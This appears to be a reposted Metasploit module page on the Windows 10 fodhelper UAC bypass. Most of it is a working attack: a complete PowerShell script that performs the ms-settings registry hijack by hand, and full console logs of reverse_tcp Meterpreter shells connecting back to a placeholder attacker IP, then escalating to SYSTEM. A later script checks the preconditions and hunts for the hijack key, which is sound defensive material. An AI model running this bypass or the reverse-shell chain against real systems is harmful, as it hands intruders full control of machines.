Windows 10 BypassUAC fodhelper module
by do son
exploit/windows/local/bypassuac_fodhelper module
This module bypasses Windows 10 UAC by hijacking a registry key under the current user's hive (HKCU\Software\Classes\ms-settings\Shell\Open\command) that is consulted when the Windows fodhelper.exe binary is launched, and inserting a custom command there. fodhelper.exe is marked auto-elevate, so UAC starts it at high integrity without a prompt, and the inserted command inherits that elevation. The result is a second shell with the UAC flag turned off (high integrity). The module writes the key, launches fodhelper.exe, and removes the key again once the payload has been invoked. It works only when UAC is enabled at its default level and the user is a member of the local Administrators group; the module checks both before continuing, as the output below shows. The architecture of the payload does not have to match the OS. If you specify EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process.
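What the module does to the registry, reproduced by hand so the mechanism is visible. This is an added example, not the module's code and not from the page; it assumes Windows 10 with UAC at its default level, a user who is in the local Administrators group, a non-elevated native PowerShell, and uses a benign probe command and temporary file of our own choosing. The key path (HKCU\Software\Classes\ms-settings\Shell\Open\command) is the one fodhelper.exe resolves.

```powershell
# Added example, not the Metasploit module's code and not from the page: the
# registry hijack the module automates, done by hand so the mechanism is visible.
# Assumptions: Windows 10 with UAC at its default level, run from a non-elevated
# (medium-integrity) native PowerShell of a user in the local Administrators
# group; $Command and $Probe are our own choices for a benign lab test.

$KeyPath = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
$Probe   = 'C:\Users\Public\fodhelper-probe.txt'
$Command = "C:\Windows\System32\cmd.exe /c whoami /groups > `"$Probe`""

# From a 32-bit PowerShell on 64-bit Windows, WoW64 redirects System32 to
# SysWOW64; the Sysnative alias reaches the real 64-bit fodhelper.exe.
$Fodhelper = if ([Environment]::Is64BitOperatingSystem -and -not [Environment]::Is64BitProcess) {
    "$env:windir\Sysnative\fodhelper.exe"
} else {
    "$env:windir\System32\fodhelper.exe"
}

try {
    # 1. fodhelper.exe is marked autoElevate in its manifest, so UAC starts it at
    #    high integrity without a prompt. On start it resolves the ms-settings:
    #    protocol handler, and HKCU\Software\Classes is searched before HKLM, so a
    #    key we can write as a plain user overrides the system handler. No
    #    ms-settings key exists under HKCU beforehand; the real one lives in HKLM.
    New-Item -Path $KeyPath -Force | Out-Null

    # 2. An empty DelegateExecute value tells the shell to run the (default)
    #    command line directly instead of calling the registered COM handler.
    New-ItemProperty -Path $KeyPath -Name 'DelegateExecute' -Value '' -PropertyType String -Force | Out-Null
    Set-ItemProperty -Path $KeyPath -Name '(default)' -Value $Command

    # 3. Launch the auto-elevating binary; our command runs in its elevated context.
    Start-Process -FilePath $Fodhelper -WindowStyle Hidden
    Start-Sleep -Seconds 5

    # 4. The probe records the integrity level the command actually ran at.
    if ((Test-Path $Probe) -and (Select-String -Path $Probe -Pattern 'High Mandatory Level' -Quiet)) {
        'Command ran at high integrity: UAC was bypassed.'
    } else {
        'Command did not run elevated (UAC set to Always notify, user not an admin, or fodhelper was blocked).'
    }
}
finally {
    # 5. Remove the hijack whether or not the launch worked, as the module does;
    #    a leftover key is both an indicator and a foothold for anyone else who
    #    can start fodhelper.exe as this user.
    Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force -ErrorAction SilentlyContinue
    Remove-Item -Path $Probe -Force -ErrorAction SilentlyContinue
}
```

The try/finally mirrors the module's own cleanup step: the hijack must be torn down even when the elevated launch fails, otherwise any later start of fodhelper.exe by this user runs whatever is left in the key.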
Windows 10 x86

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <MSF_IP>         yes       The listen address
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x86_IP>:49423) at 2017-06-01 10:02:18 -0500
meterpreter > sysinfo
Computer : DESKTOP-GS5CHPG
OS : Windows 10 (Build 10240).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > getuid
Server username: DESKTOP-GS5CHPG\msfuser
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > show options

Module options (exploit/windows/local/bypassuac_fodhelper):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf exploit(bypassuac_fodhelper) > run
[*] Started reverse TCP handler on <MSF_IP>:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x86_IP>:49424) at 2017-06-01 10:03:28 -0500
[*] Cleaining up registry keys ...
meterpreter > getuid
Server username: DESKTOP-GS5CHPG\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-GS5CHPG
OS : Windows 10 (Build 10240).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
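The three checks the module prints before continuing ("UAC is Enabled", "Part of Administrators group!", "UAC is set to Default"), done by hand in PowerShell, plus a hunt for the hijack key across loaded user hives for anyone defending such a host. This is an added example, not the module's code and not from the page; it assumes Windows 10 with Windows PowerShell 5.1 or later, run from the medium-integrity session of the user being assessed, and the registry values and whoami output formats are the documented Windows ones.

```powershell
# Added example, not the Metasploit module's code and not from the page: the
# preconditions the module reports, checked by hand, plus a hunt for the
# per-user ms-settings hijack key the technique leaves behind if cleanup fails.
# Assumptions: Windows 10, Windows PowerShell 5.1 or later, run from the
# medium-integrity session of the user being assessed.

$HijackSubKey = 'Software\Classes\ms-settings\Shell\Open\command'

function Get-UacState {
    $p = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    # ConsentPromptBehaviorAdmin: 5 = Default (auto-elevating Windows binaries
    # such as fodhelper.exe skip the prompt, so the bypass works); 1-4 prompt
    # for every elevation ("Always notify" variants, which the module refuses);
    # 0 = elevate without prompting, where no bypass is needed at all.
    [pscustomobject]@{
        UacEnabled            = [bool]$p.EnableLUA
        AdminPromptBehavior   = [int]$p.ConsentPromptBehaviorAdmin
        BypassableByFodhelper = ([bool]$p.EnableLUA) -and ([int]$p.ConsentPromptBehaviorAdmin -eq 5)
    }
}

function Get-TokenState {
    # whoami /groups lists the token's groups with their attributes. The filtered
    # (medium-integrity) token of an administrator still carries S-1-5-32-544,
    # but flagged "Group used for deny only": that is the state session 1 above
    # is in, and it is why getsystem fails before the bypass and succeeds after.
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    $admin  = $groups | Where-Object SID -eq 'S-1-5-32-544'
    $label  = $groups | Where-Object SID -like 'S-1-16-*'
    [pscustomobject]@{
        InAdministrators = $null -ne $admin
        TokenFiltered    = [bool]($admin -and ($admin.Attributes -match 'deny only'))
        IntegrityLevel   = if ($label) { $label.'Group Name' } else { 'unknown' }
    }
}

function Find-FodhelperHijack {
    # Look in every loaded user hive under HKEY_USERS, not just our own HKCU:
    # an attacker's key lives in *their* profile. The "_Classes" hives are
    # skipped because the path below already descends into Software\Classes.
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    foreach ($hive in Get-ChildItem HKU:\ | Where-Object Name -match 'S-1-5-21-\d+-\d+-\d+-\d+$') {
        $key = "HKU:\$($hive.PSChildName)\$HijackSubKey"
        if (Test-Path $key) {
            $v = Get-ItemProperty $key
            [pscustomobject]@{
                Hive            = $hive.PSChildName
                Command         = $v.'(default)'
                DelegateExecute = $v.DelegateExecute
            }
        }
    }
}

$uac   = Get-UacState
$token = Get-TokenState
"UAC enabled: $($uac.UacEnabled); admin prompt behavior: $($uac.AdminPromptBehavior); bypassable by fodhelper: $($uac.BypassableByFodhelper)"
"In Administrators: $($token.InAdministrators); filtered token: $($token.TokenFiltered); integrity: $($token.IntegrityLevel)"
$hits = @(Find-FodhelperHijack)
if ($hits.Count -eq 0) { 'No ms-settings hijack key found in any loaded user hive.' }
else { $hits | Format-Table -AutoSize }
```

The module itself does the equivalent of Get-UacState and Get-TokenState before writing anything; Find-FodhelperHijack is the defender's side of the same fact, since a key under HKCU\Software\Classes\ms-settings has no legitimate reason to exist on a stock Windows 10 profile.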
Windows 10 x64 with x86 payload
Note that the module launches the stager through C:\Windows\Sysnative\cmd.exe in this run: a 32-bit process on 64-bit Windows is subject to WoW64 file-system redirection, and the Sysnative alias is how it reaches the native 64-bit System32.

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <MSF_IP>         yes       The listen address
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49422) at 2017-06-01 10:05:04 -0500
meterpreter > sysinfo
Computer : DESKTOP-AI9785J
OS : Windows 10 (Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > show options

Module options (exploit/windows/local/bypassuac_fodhelper):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf exploit(bypassuac_fodhelper) > run
[*] Started reverse TCP handler on <MSF_IP>:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\Sysnative\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x64_IP>:49423) at 2017-06-01 10:06:02 -0500
[*] Cleaining up registry keys ...
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > sysinfo
Computer : DESKTOP-AI9785J
OS : Windows 10 (Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Windows 10 x64 with x64 payload
Note that the elevated session 2 in this run is still an x86 Meterpreter (the 957487-byte stage) even though session 1 is x64: the module's default payload and target are windows/meterpreter/reverse_tcp and "Windows x86" regardless of the session's architecture, so set an x64 payload and the x64 target explicitly if you need a native 64-bit elevated session.

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <MSF_IP>         yes       The listen address
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49424) at 2017-06-01 10:07:48 -0500
meterpreter > sysinfo
Computer : DESKTOP-AI9785J
OS : Windows 10 (Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > run
[*] Started reverse TCP handler on <MSF_IP>:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x64_IP>:49425) at 2017-06-01 10:08:41 -0500
[*] Cleaining up registry keys ...
meterpreter > sysinfo
Computer : DESKTOP-AI9785J
OS : Windows 10 (Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Source: GitHub (rapid7/metasploit-framework module documentation)